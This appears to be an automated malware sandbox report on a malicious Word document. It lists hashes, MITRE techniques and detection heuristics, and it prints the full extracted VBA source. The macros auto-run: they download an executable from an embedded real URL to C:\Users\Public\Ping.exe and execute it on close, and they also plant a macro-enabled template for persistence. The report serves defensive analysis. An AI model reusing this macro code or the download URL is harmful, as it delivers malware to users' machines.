Office (OOXML) malware analysis — malicious · 5d3220db34868fc9

MALICIOUS

Office (OOXML)

21.3 KB Created: 2021-07-02 07:38:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-07-07

MD5: a74497d04d2cf01540c33050a1fd8f61 SHA-1: 3a25a29ba3d3c5e879ff1c11718ef1a6dd972fd2 SHA-256: 5d3220db34868fc98137b7dfb3a6ee47db386f145b534fb4a13ef5e0b5df9268

286 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample contains VBA macros with AutoOpen, AutoNew, and AutoClose subroutines. The AutoNew subroutine uses URLDownloadToFile to download a file named 'Acrobat.exe' from 'http://www.unicauca.edu.co/regionalizacion/sites/default/files/kavach-1-5/Acrobat.exe' to 'C:\Users\Public\Ping.exe'. The AutoClose subroutine then executes this downloaded file. The document body attempts to lure the user into interacting with the document by suggesting an update is required.

Heuristics 8

ClamAV: Doc.Malware.Mrafr-10020543-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Mrafr-10020543-0
VBA project inside OOXML medium 5 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Sub autoclose()
    Shell ("C:\Users\Public\Ping.exe")
End Sub
```

URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD

URLDownloadToFile in VBA

Matched line in script

Attribute VB_Name = "NewMacros"
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
    Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, _

AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro

Matched line in script

Sub autoopen()
    curfile = ActiveDocument.Path & "\" & ActiveDocument.Name

Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro
Matched line in script
```
Sub autoclose()
    Shell ("C:\Users\Public\Ping.exe")
```

Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Matched line in script

    curfile = ActiveDocument.Path & "\" & ActiveDocument.Name
    templatefile = Environ("appdata") & "\Microsoft\Templates\" & DateDiff("s", #1/1/1970#, Now()) & ".dotm"
    ActiveDocument.SaveAs2 FileName:=templatefile, FileFormat:=wdFormatXMLTemplateMacroEnabled, AddToRecentFiles:=True

Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.unicauca.edu.co/regionalizacion/sites/default/files/kavach-1-5/Acrobat.exe Referenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	1343 bytes
SHA-256: `0638f0f9bd27264ca0ad7b373a7be75d4084abe66b47182b57491e2faddb7873`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NewMacros" Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _ Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, _ ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Sub autoopen() curfile = ActiveDocument.Path & "\" & ActiveDocument.Name templatefile = Environ("appdata") & "\Microsoft\Templates\" & DateDiff("s", #1/1/1970#, Now()) & ".dotm" ActiveDocument.SaveAs2 FileName:=templatefile, FileFormat:=wdFormatXMLTemplateMacroEnabled, AddToRecentFiles:=True ActiveDocument.SaveAs2 FileName:=curfile, FileFormat:=wdFormatXMLDocumentMacroEnabled Documents.Add Template:=templatefile, NewTemplate:=False, DocumentType:=0 End Sub Sub autonew() imgsrc = "http://www.unicauca.edu.co/regionalizacion/sites/default/files/kavach-1-5/Acrobat.exe" dlpath = "C:\Users\Public\\" URLDownloadToFile 0, imgsrc, dlpath & "Ping.exe", 0, 0 End Sub Sub autoclose() Shell ("C:\Users\Public\Ping.exe") End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	18944 bytes
SHA-256: `a2c37af466f7d301fe8ed055ecd2a30fee3b5f24545ccae965cffddec7e84315`
Detection ClamAV: Doc.Malware.Mrafr-10020543-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.